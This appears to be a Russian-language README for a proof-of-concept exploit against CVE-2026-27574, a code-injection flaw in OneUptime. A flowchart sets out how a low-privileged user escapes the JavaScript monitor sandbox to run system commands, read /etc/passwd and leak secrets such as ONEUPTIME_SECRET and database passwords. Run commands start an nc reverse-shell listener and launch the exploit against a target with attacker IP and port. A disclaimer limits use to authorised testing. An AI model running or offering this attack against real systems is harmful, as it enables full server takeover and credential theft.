
Эксплойт proof-of-concept для CVE-2026-27574, критической инъекции кода в OneUptime, позволяющей удалённое выполнение кода и утечку переменных окружения.
Исправлено в: OneUptime 10.0.0 (миграция на isolated-vm)
Тип эксплойта: Удалённый
Аутентификация: Низкие привилегии (любой зарегистрированный участник проекта)
Воздействие: Полная компрометация сервера, кража учётных данных, захват кластера
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]
# Запустить слушатель (при использовании reverse shell)
nc -lvnp 4444
# Запустить эксплойт
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests (pip install requests)Этот код предоставлен только для образовательных целей и авторизованного тестирования безопасности.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Разработано Mohammed Idrees Banyamer • Иордания • @banyamer_security